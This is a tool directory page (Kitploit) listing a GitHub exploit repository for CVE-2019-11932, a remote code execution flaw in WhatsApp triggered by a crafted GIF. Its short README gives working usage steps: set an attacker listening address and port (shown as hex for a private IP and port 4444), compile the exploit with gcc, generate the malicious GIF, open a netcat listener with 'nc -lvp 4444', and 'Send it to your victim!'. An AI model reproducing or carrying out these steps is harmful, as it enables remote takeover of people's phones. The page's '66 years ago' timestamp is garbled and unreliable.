Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2019-11932 | Kitploit
Tools/GitHubGitHub/smozy92/cve-2019-11932
Payload GenerationVulnerability AnalysisExploitationRemote Access ToolBinary Exploitation
GitHubsmozy92/cve-2019-11932

CVE-2019-11932

View Repository
66 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-11932

Modify the listening address (attacker's) and the listening port in the exploit.c file
Following hex code:

3139 322e 3136
382e 322e 3732 2034 3434 3420

alt text

Compile the code:
gcc -o exploit egif_lib.c exploit.c

Run the compiled file ./exploit exploit.gif
copy/paste the output into a gif

Start the netcat listener:
nc -lvp 4444

Send it to your victim!

Affected versions: 2.19.230 and below
Officially patched in version 2.19.244

Source: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/

LinkedIn : https://www.linkedin.com/in/thomas-lounis-749456175/

Download Tool